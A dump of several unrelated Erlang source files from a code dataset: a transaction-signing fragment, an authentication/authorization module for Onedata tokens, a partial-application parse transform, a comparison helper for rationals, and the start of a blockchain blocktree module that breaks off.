<<"block_hash">> => BlockHash,
<<"hash">> => dsdc_base58c:encode(tx_hash, TxHash),
<<"signatures">> => lists:map(fun(Sig) -> dsdc_base58c:encode(signature, Sig) end, Sigs)}.
meta_data_from_client_serialized(message_pack, Bin) ->
{transaction, MsgPackBin} = dsdc_base58c:decode(Bin),
{ok, [_Type, _Version, _TxSer, GenericData]} = msgpack:unpack(MsgPackBin),
[#{<<"block_height">> := BlockHeight},
#{<<"block_hash">> := BlockHashEncoded},
#{<<"hash">> := TxHashEncoded}] = GenericData,
{block_hash, BlockHash} = dsdc_base58c:decode(BlockHashEncoded),
{tx_hash, TxHash} = dsdc_base58c:decode(TxHashEncoded),
#{block_height => BlockHeight,
block_hash => BlockHash,
hash => TxHash};
meta_data_from_client_serialized(json, Serialized) ->
#{<<"tx">> := _EncodedTx,
<<"block_height">> := BlockHeight,
<<"block_hash">> := BlockHashEncoded,
<<"hash">> := TxHashEncoded,
<<"signatures">> := _Sigs} = Serialized,
{block_hash, BlockHash} = dsdc_base58c:decode(BlockHashEncoded),
{tx_hash, TxHash} = dsdc_base58c:decode(TxHashEncoded),
#{block_height => BlockHeight,
block_hash => BlockHash,
hash => TxHash}. | apps/dsdtx/src/dsdtx_sign.erl | 0.625896 | 0.671847 | dsdtx_sign.erl | starcoder |
%%%-------------------------------------------------------------------
%%% @author <NAME>
%%% @copyright (C) 2019 ACK CYFRONET AGH
%%% This software is released under the MIT license
%%% cited in 'LICENSE.txt'.
%%% @end
%%%-------------------------------------------------------------------
%%% @doc
%%% This module includes some common functions and types related to AAI in Onedata.
%%% AAI stands for Authentication and Authorization Infrastructure.
%%% AAI in Onedata assumes the approach of IBAC (Identity Based Access Control).
%%% This means that authorization to perform certain operations is based on
%%% the client's identity (represented by #subject{} in Onedata) and other
%%% attributes of the resources (privileges, existing relations, token caveats).
%%%
%%% Onedata uses tokens to carry client's identity and possibly some contextual
%%% confinements taken into account during authorization. They have the following
%%% characteristics:
%%% * each token is issued for a certain subject - user or Oneprovider
%%% * tokens allow to perform operations on behalf of the subject - authority
%%% delegation can be easily achieved by passing the token to another party
%%% * tokens can have contextual confinements which all must be satisfied
%%% during request authorization
%%% * tokens are represented by the #token{} record
%%% * tokens are implemented using the macaroons library
%%%
%%% The #auth{} object is used universally as the successful result of client
%%% *authentication*, not only regarding Onedata tokens, but also basic auth or
%%% third party tokens. It carries the client's identity (#subject{}) and other
%%% contextual information that is later used for *authorization*, for example
%%% the IP of the client or contextual caveats that were included in the
%%% presented token.
%%%
%%% There are three types of tokens:
%%% * access token - carries subject's authentication and authorization to
%%% perform certain operations. Can be linked to specific user's session.
%%% * identity token - can be used only for identity verification (does not
%%% carry any authorization).
%%% * invite token - used to create relations in the system by inviting
%%% users or providers to join an entity.
%%%
%%% In order to verify a token, it is required to collect the request context,
%%% against which the token caveats are checked. The context is expressed using
%%% the #auth_ctx{} record. It consists of:
%%% * current timestamp
%%% * scope (unlimited or identity_token) stating what level of authorization
%%% is required from the token
%%% (@todo VFS-6098 to be removed in the next major version)
%%% * peer IP from which the request has been made
%%% * interface to which the client has connected
%%% * service in which the token was used (described below)
%%% * consumer - token bearer that consumes the token (described below)
%%% * data_access_caveats_policy - information if data access caveats are
%%% allowed in the context of this request (see data_access_caveats module)
%%% * group_membership_checker - callback to check group membership
%%%
%%% The service in which the token was used (i.e. service which received the
%%% request from a client) is denoted by the #service_spec{} record. The service
%%% that tries to authorize an operation with a token on behalf of a subject can
%%% present its authentication by sending its identity token in the the
%%% x-onedata-service-token header, or perform the operation on a private
%%% channel (GraphSync). If the service does not authenticate itself, it defaults
%%% to undefined. The token may include a cv_service caveat - in this case,
%%% the service must be whitelisted in the caveat for the request to succeed.
%%%
%%% The request consumer is the token bearer that consumes the token - either a
%%% user or a ?ONEPROVIDER service, expressed using the #subject{} record. The
%%% consumer can authenticate themselves by sending its identity token in the
%%% the x-onedata-consumer-token header, or perform the operation on a private
%%% channel (GraphSync). Otherwise, the consumer defaults to undefined. The
%%% token may include a cv_consumer caveat - in this case, the consumer must be
%%% whitelisted in the caveat for the request to succeed.
%%%
%%% ?ONEPROVIDER access tokens are a specific case where the serialized form can
%%% have a three letter indicator of service type that is authorizing itself
%%% (op-worker or op-panel), e.g. opw-MDax34Gh5TyOP032... It is added using the
%%% tokens:add_oneprovider_service_indication/2 function (consult for details). This
%%% is merely an indication for Onezone which of the services has authenticated,
%%% as both services use the same access token.
%%% @end
%%%-------------------------------------------------------------------
-module(aai).
-author("<NAME>").
-include("aai/aai.hrl").
-include("onedata.hrl").
-type subject() :: #subject{}.
% Tokens can be issued only for a user or ?ONEPROVIDER subject - this means that
% clients are able to authenticate themselves only as a user or Oneprovider.
% Other subject types are used in internal application logic:
% * The 'root' subject is authorized to do everything and must be used with caution.
% * The 'group' subject is used in cv_consumer caveats to allow token consumption
% for any member of specified group
-type subject_type() :: nobody | root | user | group | ?ONEPROVIDER.
% Applicable only in case of ?ONEPROVIDER type to differentiate between
% ?OP_WORKER and ?OP_PANEL services, that both use the same access token
-type subject_subtype() :: undefined | ?OP_WORKER | ?OP_PANEL.
% Applicable in case of user, group or ?ONEPROVIDER type
-type subject_id() :: undefined | binary().
% Special wildcard id <<"*">> can be used to match any id in a service
-type service_spec() :: #service_spec{}.
% Consumers are expressed using the subject record. This type is introduced for
% clearer code and semantics. Special wildcard id <<"*">> can be used to match
% any id in a consumer.
-type consumer_spec() :: subject().
% Can be undefined if the auth object is not related to any session
-type session_id() :: undefined | binary().
-type group_membership_checker() :: fun((subject(), GroupId :: gri:entity_id()) -> boolean()).
-type auth() :: #auth{}.
-type auth_ctx() :: #auth_ctx{}.
-export_type([subject/0, subject_type/0, subject_subtype/0, subject_id/0]).
-export_type([service_spec/0, consumer_spec/0]).
-export_type([session_id/0]).
-export_type([group_membership_checker/0]).
-export_type([auth/0, auth_ctx/0]).
%%% API
-export([root_auth/0, nobody_auth/0, user_auth/1]).
-export([normalize_subject/1]).
-export([subject_to_json/1, subject_from_json/1]).
-export([serialize_subject/1, deserialize_subject/1]).
-export([service_to_json/1, service_from_json/1]).
-export([serialize_service/1, deserialize_service/1]).
-export([auth_to_printable/1]).
-export([subject_to_printable/1]).
-export([service_to_printable/1]).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
%% @doc
%% Returns the Auth object representing ROOT authorization
%% (allowed to perform all operations).
%% @end
%%--------------------------------------------------------------------
-spec root_auth() -> auth().
root_auth() ->
?ROOT.
%%--------------------------------------------------------------------
%% @doc
%% Returns the Auth object representing NOBODY authorization
%% (allowed only to perform publicly available operations).
%% @end
%%--------------------------------------------------------------------
-spec nobody_auth() -> auth().
nobody_auth() ->
?NOBODY.
%%--------------------------------------------------------------------
%% @doc
%% Returns the Auth object representing USER authorization for given UserId.
%% @end
%%--------------------------------------------------------------------
-spec user_auth(UserId :: subject_id()) -> auth().
user_auth(UserId) ->
?USER(UserId).
%%--------------------------------------------------------------------
%% @doc
%% Ensures that the subject represents an identity of an external actor in the
%% system - user, Oneprovider or nobody (a.k.a. guest or anonymous). Transforms
%% other subjects that are valid only in internal application logic
%% (root, group) to nobody.
%% @end
%%--------------------------------------------------------------------
-spec normalize_subject(aai:subject()) -> aai:subject().
normalize_subject(?SUB(user, UserId)) -> ?SUB(user, UserId);
normalize_subject(?SUB(?ONEPROVIDER, PrId)) -> ?SUB(?ONEPROVIDER, PrId);
normalize_subject(_) -> ?SUB(nobody).
-spec subject_to_json(subject()) -> json_utils:json_term().
subject_to_json(?SUB(nobody)) ->
#{<<"type">> => <<"nobody">>, <<"id">> => null};
% root subject must not have a representation outside of the application
subject_to_json(?SUB(root)) ->
#{<<"type">> => <<"nobody">>, <<"id">> => null};
subject_to_json(?SUB(user, UserId)) ->
#{<<"type">> => <<"user">>, <<"id">> => UserId};
subject_to_json(?SUB(group, GroupId)) ->
#{<<"type">> => <<"group">>, <<"id">> => GroupId};
subject_to_json(?SUB(?ONEPROVIDER, PrId)) ->
#{<<"type">> => <<"oneprovider">>, <<"id">> => PrId};
subject_to_json(_) ->
error(badarg).
-spec subject_from_json(json_utils:json_term()) -> subject().
subject_from_json(#{<<"type">> := <<"nobody">>, <<"id">> := null}) ->
?SUB(nobody);
subject_from_json(#{<<"type">> := <<"user">>, <<"id">> := UserId}) ->
?SUB(user, UserId);
subject_from_json(#{<<"type">> := <<"group">>, <<"id">> := GroupId}) ->
?SUB(group, GroupId);
subject_from_json(#{<<"type">> := <<"oneprovider">>, <<"id">> := PrId}) ->
?SUB(?ONEPROVIDER, PrId);
subject_from_json(_) ->
error(badarg).
-spec serialize_subject(subject()) -> binary().
serialize_subject(?SUB(nobody)) -> <<"nobody">>;
% root subject must not have a representation outside of the application
serialize_subject(?SUB(root)) -> <<"nobody">>;
serialize_subject(?SUB(user, UserId)) -> <<"usr-", UserId/binary>>;
serialize_subject(?SUB(group, GroupId)) -> <<"grp-", GroupId/binary>>;
serialize_subject(?SUB(?ONEPROVIDER, Provider)) -> <<"prv-", Provider/binary>>;
serialize_subject(_) -> error(badarg).
-spec deserialize_subject(binary()) -> subject().
deserialize_subject(<<"nobody">>) -> ?SUB(nobody);
deserialize_subject(<<"usr-", UserId/binary>>) -> ?SUB(user, UserId);
deserialize_subject(<<"grp-", GroupId/binary>>) -> ?SUB(group, GroupId);
deserialize_subject(<<"prv-", Provider/binary>>) -> ?SUB(?ONEPROVIDER, Provider);
deserialize_subject(_) -> error(badarg).
-spec service_to_json(service_spec()) -> json_utils:json_term().
service_to_json(?SERVICE(?OZ_WORKER, Id)) -> #{<<"type">> => <<"oz_worker">>, <<"id">> => Id};
service_to_json(?SERVICE(?OZ_PANEL, Id)) -> #{<<"type">> => <<"oz_panel">>, <<"id">> => Id};
service_to_json(?SERVICE(?OP_WORKER, Id)) -> #{<<"type">> => <<"op_worker">>, <<"id">> => Id};
service_to_json(?SERVICE(?OP_PANEL, Id)) -> #{<<"type">> => <<"op_panel">>, <<"id">> => Id};
service_to_json(_) -> error(badarg).
-spec service_from_json(json_utils:json_term()) -> service_spec().
service_from_json(#{<<"type">> := <<"oz_worker">>, <<"id">> := Id}) -> ?SERVICE(?OZ_WORKER, Id);
service_from_json(#{<<"type">> := <<"oz_panel">>, <<"id">> := Id}) -> ?SERVICE(?OZ_PANEL, Id);
service_from_json(#{<<"type">> := <<"op_worker">>, <<"id">> := Id}) -> ?SERVICE(?OP_WORKER, Id);
service_from_json(#{<<"type">> := <<"op_panel">>, <<"id">> := Id}) -> ?SERVICE(?OP_PANEL, Id);
service_from_json(_) -> error(badarg).
-spec serialize_service(service_spec()) -> binary().
serialize_service(?SERVICE(Type, Id)) ->
<<(onedata:service_shortname(Type))/binary, "-", Id/binary>>.
-spec deserialize_service(binary()) -> service_spec().
deserialize_service(<<Type:3/binary, "-", Id/binary>>) ->
?SERVICE(onedata:service_by_shortname(Type), Id);
deserialize_service(_) ->
error(badarg).
-spec auth_to_printable(auth()) -> string().
auth_to_printable(?NOBODY) -> "nobody (unauthenticated client)";
auth_to_printable(?ROOT) -> "root";
auth_to_printable(?USER(UId)) -> str_utils:format("user:~s", [UId]);
auth_to_printable(?PROVIDER(PId)) -> str_utils:format("provider:~s", [PId]).
-spec subject_to_printable(subject()) -> string().
subject_to_printable(?SUB(Type, Id)) -> str_utils:format("~s:~s", [Type, Id]).
-spec service_to_printable(service_spec()) -> string().
service_to_printable(?SERVICE(Type, Id)) -> str_utils:format("~s:~s", [Type, Id]). | src/auth/aai.erl | 0.508544 | 0.454775 | aai.erl | starcoder |
%%%-------------------------------------------------------------------
%%% @doc
%%% A parse transform implementing partial function application.
%%%
%%% To enable, add to the top of your module:
%%%
%%% ```
%%% -compile({parse_transform, partial}).
%%% '''
%%%
%%% This will enable compile time conversion of calls to
%%% `partial:cut/1' and `partial:cute/1' into partial function
%%% application of the contained function. `_' is used as a marker for
%%% the unevaluated slot(s) in the contained function.
%%%
%%% With `partial:cut/1', the arguments to the called function are
%%% evaluated when the returned function is applied. With
%%% `partial:cute/1', the arguments are evaluated when the function is
%%% constructed.
%%%
%%% Additionally, a compile option can be specified via erlc options
%%% or by adding to the top of your module:
%%%
%%% ```
%%% -compile(partial_allow_local).
%%% '''
%%%
%%% To enable transforming `cut/1' and `cute/1' the same as the fully
%%% qualified names.
%%% @end
%%%-------------------------------------------------------------------
-module(partial).
% Manually enable debugging. Should usually just use a compiler flag,
% though. Is quite verbose.
% -define(PARTIAL_DEBUG, true).
-ifdef(PARTIAL_DEBUG).
-define(IF_DEBUG(Expression), Expression).
-else.
-define(IF_DEBUG(Expression), (ok)).
-endif.
%% API
-export([cut/1,
cute/1,
parse_transform/2]).
-record(cut, {variables=[], arguments=[]}).
-record(cute, {variables=[], matches=[], arguments=[]}).
-include_lib("syntax_tools/include/merl.hrl").
%%%===================================================================
%%% API
%%%===================================================================
%% @doc
%% A dummy function used as a marker by `parse_transform/2' to convert
%% calls to functions to partially applied functions. The special
%% variable `_' is used as a marker for unevaluated arguments, as it
%% is usually illegal to use on the right hand side of a match.
%%
%% All arguments are evaluated when the partially applied function is
%% called.
%%
%% The parse transform is only able to detect and rewrite simple
%% literal calls to this function. Other uses will result in an error
%% being thrown at runtime.
%% @end
%% @see parse_transform/2
cut(_Fun) ->
missing_parse_transform().
%% @doc
%% A dummy function used as a marker by `parse_transform/2' to convert
%% calls to functions to partially applied functions. The special
%% variable `_' is used as a marker for unevaluated arguments, as it
%% is usually illegal to use on the right hand side of a match.
%%
%% Given arguments are evaluated when the partially applied function
%% is constructed. This can be used as an easy way to cache expensive
%% computation in a closure.
%%
%% The parse transform is only able to detect and rewrite simple
%% literal calls to this function. Other uses will result in an error
%% being thrown at runtime.
%% @end
%% @see parse_transform/2
cute(_Fun) ->
missing_parse_transform().
%% @doc
%% A parse transformation function which converts calls to special
%% dummy functions in this module.
%%
%% Add this compile attribute to the top of any module to enable:
%% ```
%% -compile({parse_transform, partial}).
%% '''
%%
%% Or globally enable by adding as a compiler flag (probably in your
%% rebar.config file).
%% @end
-spec parse_transform(Forms, Options) -> NewForms when
Forms :: [erl_parse:abstract_form() | erl_parse:form_info()],
Options :: [compile:option()],
NewForms :: [erl_parse:abstract_form() | erl_parse:form_info()].
parse_transform(Forms, Options) ->
GlobalOptions = parse_options(Options),
FileOptions = parse_compile_attributes(Forms),
MergedOptions = merge_options(GlobalOptions, FileOptions),
?IF_DEBUG(ok = io:format(
"partial:parse_transform/2 options:~n~p~n",
[MergedOptions])),
transform_forms(Forms, MergedOptions).
%%%===================================================================
%%% Internal Functions
%%%===================================================================
missing_parse_transform() ->
throw({missing_parse_transform,
"This function requires that the partial:parse_trans/2 "
"function be listed as a parse transformation for your "
"module as \"-compile({parse_transform, partial}).\" "
"If that is already true, this function has been called "
"indirectly in a way the parse transform can not "
"recognize, such as via apply/3."}).
parse_options(Options) ->
?IF_DEBUG(ok = io:format(
"partial:parse_options/2 options:~n~p~n",
[Options])),
AllowLocal = proplists:get_value(partial_allow_local, Options),
ok = case lists:member(AllowLocal, [true, false, undefined]) of
true ->
ok;
false ->
Message = lists:flatten(
io_lib:format(
"Value for compiler option partial_allow_local "
"must be a boolean, but value was: ~w",
[AllowLocal])),
error({invalid_compile_option, Message})
end,
#{allow_local=>AllowLocal}.
compile_attributes(Forms) ->
Attributes = [begin
Attribute = erl_syntax:concrete(Args),
case is_list(Attribute) of
true ->
Attribute;
false ->
[Attribute]
end
end ||
Form <- Forms,
{match, Args} <- [case Form of
?Q("-compile('@Args').") ->
{match, Args};
_ ->
undefined
end]],
lists:append(Attributes).
parse_compile_attributes(Forms) ->
Attributes = compile_attributes(Forms),
parse_options(Attributes).
%% @private
%% @doc
%% We parse options from the compiler and from the file being
%% compiled. If an option is only given in one place, use that. If
%% given in both places the file overrides the global option.
%% @end
-spec merge_options(GlobalOptions, FileOptions) -> Options when
GlobalOptions :: #{allow_local:=undefined | boolean()},
FileOptions :: #{allow_local:=undefined | boolean()},
Options :: #{allow_local:=boolean()}.
merge_options(#{allow_local:=undefined}, #{allow_local:=undefined}) ->
#{allow_local=>false};
merge_options(#{allow_local:=undefined}, #{allow_local:=true}) ->
#{allow_local=>true};
merge_options(#{allow_local:=undefined}, #{allow_local:=false}) ->
#{allow_local=>false};
merge_options(#{allow_local:=true}, #{allow_local:=undefined}) ->
#{allow_local=>true};
merge_options(#{allow_local:=false}, #{allow_local:=undefined}) ->
#{allow_local=>false};
merge_options(#{allow_local:=true}, #{allow_local:=true}) ->
#{allow_local=>true};
merge_options(#{allow_local:=true}, #{allow_local:=false}) ->
#{allow_local=>false};
merge_options(#{allow_local:=false}, #{allow_local:=true}) ->
#{allow_local=>true};
merge_options(#{allow_local:=false}, #{allow_local:=false}) ->
#{allow_local=>false}.
transform_forms(Forms, Options) ->
% If any errors occured, we replace the entire form with them.
% This allows the standard compiler chain to pick them up as if
% they were erl_parse errors and display a standard error message
% to the user instead of a traceback.
Transform = fun (Form, Errors) ->
transform(Form, Errors, Options)
end,
erl_syntax:revert_forms(
lists:append(
[case erl_syntax_lib:mapfold(Transform, [], Form) of
{Transformed, []} ->
[Transformed];
{_Transformed, Errors} ->
Errors
end || Form <- Forms])).
transform(Form, Errors, Options) ->
Line = erl_syntax:get_pos(Form),
Transformed = case Form of
?Q("partial:cut(_@@Args)") ->
cut_function(Line, Args);
?Q("cut(_@@Args)") ->
case Options of
#{allow_local:=true} ->
cut_function(Line, Args);
_ ->
{ok, Form}
end;
?Q("partial:cute(_@@Args)") ->
cute_function(Line, Args);
?Q("cute(_@@Args)") ->
case Options of
#{allow_local:=true} ->
cute_function(Line, Args);
_ ->
{ok, Form}
end;
_ ->
{ok, Form}
end,
case Transformed of
{ok, NewForm} ->
{NewForm, Errors};
{error, Error} ->
{Form, [Error | Errors]}
end.
transform_error(Line, Message) ->
% I'm probably abusing the error system by using erl_parse here,
% but it allows my errors to show up as usual in the compiler
% output.
Prefix = "Error: In partial:parse_transform/2, ",
{error, erl_syntax:error_marker({Line, erl_parse, Prefix ++ Message})}.
reverse(#cut{} = Cut) ->
#cut{variables=lists:reverse(Cut#cut.variables),
arguments=lists:reverse(Cut#cut.arguments)};
reverse(#cute{} = Cute) ->
#cute{variables=lists:reverse(Cute#cute.variables),
matches=lists:reverse(Cute#cute.matches),
arguments=lists:reverse(Cute#cute.arguments)}.
is_cut_variable(Var) ->
case Var of
?Q("_") ->
true;
_ ->
false
end.
variable_name(Type) ->
Name = io_lib:format("PartialArgument_~s_~w", [Type, make_ref()]),
erlang:list_to_atom(lists:flatten(Name)).
variable(Line, Type) ->
erl_syntax:set_pos(erl_syntax:variable(variable_name(Type)), Line).
name([Name]) ->
[Name];
name([Module, Function]) ->
?Q("_@Module:_@Function").
split_name(Name) ->
case Name of
?Q("_@Module:_@Function") ->
[Module, Function];
_ ->
[Name]
end.
match(Line, Type, Form) ->
Pattern = variable(Line, Type),
Match = merl:qquote(Line,
"_@pattern = _@form",
[{pattern, Pattern}, {form, Form}]),
{Pattern, Match}.
cuts(Line, Type, Forms) ->
reverse(lists:foldl(
fun (Form, #cut{} = Acc) ->
case is_cut_variable(Form) of
true ->
Variable = variable(Line, Type),
Acc#cut{variables=[Variable | Acc#cut.variables],
arguments=[Variable | Acc#cut.arguments]};
false ->
Acc#cut{arguments=[Form | Acc#cut.arguments]}
end
end,
#cut{},
Forms)).
name_cuts(Line, Name) ->
Parts = split_name(Name),
Cut = cuts(Line, name, Parts),
Cut#cut{arguments=name(Cut#cut.arguments)}.
cutes(Line, Type, Forms) ->
reverse(lists:foldl(
fun (Form, #cute{} = Acc) ->
case {is_cut_variable(Form), erl_syntax:is_literal(Form)} of
{true, false} ->
Variable = variable(Line, Type),
Acc#cute{variables=[Variable | Acc#cute.variables],
arguments=[Variable | Acc#cute.arguments]};
{false, true} ->
Acc#cute{arguments=[Form | Acc#cute.arguments]};
{false, false} ->
{Variable, Match} = match(Line, Type, Form),
Acc#cute{matches=[Match | Acc#cute.matches],
arguments=[Variable | Acc#cute.arguments]}
end
end,
#cute{},
Forms)).
name_cutes(Line, Name) ->
Parts = split_name(Name),
Cute = cutes(Line, name, Parts),
Cute#cute{arguments=name(Cute#cute.arguments)}.
%% @private
%% @doc
%% Transform the AST for:
%%
%% F = partial:cut(f(_, x, y, z)).
%%
%% into:
%%
%% F = fun (Arg1) ->
%% f(Arg1, x, y, z)
%% end.
%% @end
cut_function(MarkerLine, [MarkerArgument])->
case MarkerArgument of
?Q("_@Name(_@@Args)") ->
?IF_DEBUG(ok = io:format(
"partial:cut_function/2 Original:~n~p~n",
[MarkerArgument])),
Line = erl_syntax:get_pos(MarkerArgument),
NameCut = name_cuts(Line, Name),
Cut = cuts(Line, cut, Args),
CutFun = merl:qquote(Line,
"fun (_@@variables) ->"
" _@name(_@@arguments)"
" end",
[{variables, NameCut#cut.variables ++ Cut#cut.variables},
{name, NameCut#cut.arguments},
{arguments, Cut#cut.arguments}]),
?IF_DEBUG(ok = io:format(
"partial:cut_function/2 Transformed:~n~p~n",
[CutFun])),
{ok, CutFun};
_ ->
transform_error(
MarkerLine,
"partial:cut/1 requires a function call as an argument")
end;
cut_function(MarkerLine, MarkerArguments) ->
transform_error(
MarkerLine,
io_lib:format(
"partial:cut/1 requires a single argument, got ~b",
[length(MarkerArguments)])).
%% @private
%% @doc
%% Transform the AST for:
%%
%% F = partial:cute(f(_, x, y, z)).
%%
%% into:
%%
%% F = (fun () ->
%% Arg2 = x,
%% Arg3 = y,
%% Arg4 = z,
%% fun (Arg1) ->
%% f(Arg1, Arg2, Arg3, Arg4)
%% end
%% end)().
%% @end
cute_function(MarkerLine, [MarkerArgument])->
case MarkerArgument of
?Q("_@Name(_@@Args)") ->
?IF_DEBUG(ok = io:format(
"partial:cute_function/2 Original:~n~p~n",
[MarkerArgument])),
Line = erl_syntax:get_pos(MarkerArgument),
NameCute = name_cutes(Line, Name),
Cute = cutes(Line, cute, Args),
CuteFun = merl:qquote(Line,
"(fun () ->"
" _@@matches,"
" fun (_@@variables) -> _@name(_@@arguments) end"
" end)()",
[{matches, NameCute#cute.matches ++ Cute#cute.matches},
{variables, NameCute#cute.variables ++ Cute#cute.variables},
{name, NameCute#cute.arguments},
{arguments, Cute#cute.arguments}]),
?IF_DEBUG(ok = io:format(
"partial:cute_function/2 Transformed:~n~p~n",
[CuteFun])),
{ok, CuteFun};
_ ->
transform_error(
MarkerLine,
"partial:cute/1 requires a function call as an argument")
end;
cute_function(MarkerLine, MarkerArguments)->
transform_error(
MarkerLine,
io_lib:format(
"partial:cute/1 requires a single argument, got ~b",
[length(MarkerArguments)])). | src/partial.erl | 0.517083 | 0.556159 | partial.erl | starcoder |
%%This file is licensed under the terms of the Modified BSD License.
-module(cmp).
-export([eq/2,le/2,ge/2,gt/2,lt/2]).
%% Wrapper for comparison functions
%% Needs special care in comparing rationals and int and rationals
eq({N,D},I) when is_integer(N),is_integer(D),is_integer(I) ->
eq({N,D},{I,1});
eq(I,{N,D}) when is_integer(N),is_integer(D),is_integer(I) ->
eq({I,1},{N,D});
eq({N,D},{N1,D1}) when is_integer(N),is_integer(D),is_integer(N1),is_integer(D1)->
rationals:proper({N,D})==rationals:proper({N1,D1});
eq({}, {}) -> true;
eq({A}, {B}) when is_tuple(A), is_tuple(B) -> eq(A, B);
eq(A, B) when is_tuple(A), is_tuple(B) ->
%% tuples representing rational numbers are handled above
eq(tuple_to_list(A), tuple_to_list(B));
eq([], []) -> true;
eq([_A | _RA], []) -> false;
eq([], [_B | _RB]) -> false;
eq([A | RA], [B | RB]) ->
eq(A, B) andalso eq(RA, RB);
eq(A,B)->
A==B.
%% If Abstract DataTypes are checked, those without arguments are not represented as tuples but as atoms
%% The rule says that the constructor name should be compared so, those names need to be compared (which is the atom itself and the first element of the tuple)
gt({N,D},I) when is_integer(N),is_integer(D),is_integer(I) ->
gt({N,D},{I,1});
gt(I,{N,D}) when is_integer(N),is_integer(D),is_integer(I) ->
gt({I,1},{N,D});
gt({N,D},{N1,D1}) when is_integer(N),is_integer(D),is_integer(N1),is_integer(D1)->
rationals:is_greater({N,D},{N1,D1});
%% As we loop through rest of tuple elements, in case we only compare one
%% remaining element we go into the tuple
gt({}, {}) -> false;
gt({A},{B}) when is_tuple(A),is_tuple(B)->
gt(A,B);
gt(A,B) when is_tuple(A),is_tuple(B)->
gt(tuple_to_list(A), tuple_to_list(B));
gt(A,T) when is_atom(A),is_tuple(T)->
A>element(1,T);
gt(T,A) when is_atom(A),is_tuple(T)->
element(1,T)>A;
gt([A | RA], [B | RB]) ->
case eq(A, B) of
true -> gt(RA, RB);
false -> gt(A, B)
end;
%% "Nil" > "Cons"
gt([], [_A | _B]) -> true;
gt([_A | _B], []) -> false;
gt(A,B)->
A>B.
lt({N,D},I) when is_integer(N),is_integer(D),is_integer(I) ->
rationals:is_lesser({N,D},{I,1});
lt(I,{N,D}) when is_integer(N),is_integer(D),is_integer(I) ->
rationals:is_lesser({I,1},{N,D});
lt({N,D},{N1,D1}) when is_integer(N),is_integer(D),is_integer(N1),is_integer(D1)->
rationals:is_lesser({N,D},{N1,D1});
lt({A},{B}) when is_tuple(A),is_tuple(B)->
lt(A,B);
lt({}, {}) -> false;
lt(A,B) when is_tuple(A),is_tuple(B)->
lt(tuple_to_list(A), tuple_to_list(B));
lt(A,T) when is_atom(A),is_tuple(T)->
A<element(1,T);
lt(T,A) when is_atom(A),is_tuple(T)->
element(1,T)<A;
lt([A | RA], [B | RB]) ->
case eq(A, B) of
true -> lt(RA, RB);
false -> lt(A, B)
end;
%% "Cons" < "Nil"
lt([], [_A | _B]) -> false;
lt([_A | _B], []) -> true;
%% no need to handle null < pid separately; atom < tuple < pid in Erlang
lt(A,B)->
A<B.
le(A,B) ->
eq(A,B) orelse lt(A,B).
ge(A,B) ->
eq(A,B) orelse gt(A,B). | frontend/src/main/resources/erlang/absmodel/src/cmp.erl | 0.50415 | 0.76388 | cmp.erl | starcoder |
%% @doc Blocktree
%%
%% Potential optimization: searches for previous nonce by player can
%% be made faster by caching previous searches. Would speed up
%% add_block_in_order and generate_new_block
-module(blocktree).
-export([
new/0,
add_new_transaction/2,
add_block_in_order/2,
generate_new_block/2,
get_block_by_id/2,
get_status_info/1
%% get_all_longest_branches/1,
%% get_children_block_list/2
]).
-include_lib("stdlib/include/assert.hrl").
-include("potato_records.hrl").
-type tx() :: map().
%% -type txarray() :: array:array(tx()).
-type txlist() :: [tx()].
-type playertxmap() :: map().
-type addresult() :: ignored_duplicate | updated_old | added_new.
%% -type addresult() :: any().
-type treedata() :: #tree_data{}.
-type playerid() :: integer().
-type nonce() :: integer().
-type blockid() :: integer() | undefined.
-type blockmap() :: map().
-type block() :: map().
%% @doc Initializes an empty container
-spec new() -> treedata().
new() ->
#tree_data{
pending_transactions = pending_transactions:new(),
block_map = maps:new()
}.
%% @doc Adds a new transaction to transaction list.
%%
%% Called when we get a new transaction from a player.
%% Can do it out of order.
%% Duplicate transactions are ignored, but we can rewrite a transaction
%% with a given nonce by a different transaction with the same nonce.
%% Returns {Status, Container} where Status is
%% ignored_duplicate, updated_old, added_new
-spec add_new_transaction(tx(), treedata()) -> {addresult(), treedata()}.
add_new_transaction(Transaction, TreeData)
when is_map(Transaction),
is_record(TreeData, tree_data) ->
{PendingTxNew, Status} = pending_transactions:add_transaction(Transaction, TreeData#tree_data.pending_transactions),
{Status, TreeData#tree_data{pending_transactions = PendingTxNew}}.
-spec transaction_list_check_if_in_order(playerid(), txlist()) -> ok.
transaction_list_check_if_in_order(_, List) ->
NonceList = lists:map(fun (T) -> maps:get(nonce, T) end, List),
[FirstNonce | _] = NonceList,
Sz = length(List),
ProperNonceList = lists:seq(FirstNonce, FirstNonce + Sz - 1),
?assertEqual(NonceList, ProperNonceList, "bad nonce order").
-spec get_first_nonce_in_transaction_list(playerid(), txlist()) -> nonce().
get_first_nonce_in_transaction_list(_, TransactionList) ->
[FirstTransaction | _ ] = TransactionList,
maps:get(nonce, FirstTransaction).
-spec get_last_nonce_in_transaction_list(txlist()) -> nonce().
get_last_nonce_in_transaction_list(TransactionList) ->
[FirstTransaction | _ ] = TransactionList,
FirstNonce = maps:get(nonce, FirstTransaction),
Sz = length(TransactionList),
FirstNonce + Sz - 1.
-spec search_previous_transaction_nonce_for_player(playerid(), blockmap(), blockid()) -> nonce().
search_previous_transaction_nonce_for_player(_, _, BlockId) when BlockId == undefined ->
-1;
search_previous_transaction_nonce_for_player(PlayerId, BlockMap, BlockId) ->
{ok, Block} = maps:find(BlockId, BlockMap),
#{previous_id := PrevBlockId, transactions := BlockTransactionsList} = Block,
BlockTransactionsMap = transaction_map_from_list(BlockTransactionsList),
case maps:find(PlayerId, BlockTransactionsMap) of
{ok, TransactionList} ->
get_last_nonce_in_transaction_list(TransactionList);
error ->
search_previous_transaction_nonce_for_player(PlayerId, BlockMap, PrevBlockId)
end.
-spec transaction_map_from_list(txlist()) -> playertxmap().
transaction_map_from_list(ListR) ->
List = lists:reverse(ListR),
lists:foldl(fun transaction_map_from_list/2, maps:new(), List).
transaction_map_from_list(T, Map) ->
Id = maps:get(player_id, T),
case maps:find(Id, Map) of
{ok, OldList} ->
NewList = [T | OldList];
error ->
NewList = [T]
end,
maps:put(Id, NewList, Map).
%% @doc Adds a new block to the blocktree.
%%
%% If successful, it returns updated TreeData.
%%
%% Fails if:
%%
%% <ul>
%% <li> can't find previous block</li>
%% <li> this_id is not unique </li>
%% <li> height is incorrect</li>
%% <li> transactions list is incorrect:
%% <ul>
%% <li> Nonces in each list should be in order</li>
%% <li> First nonce in a list should come after the last nonce in the chain for that player</li>
%% </ul>
%% </li>
%% </ul>
%%
%% Note: genesis block will have previous_id=undefined and height=0
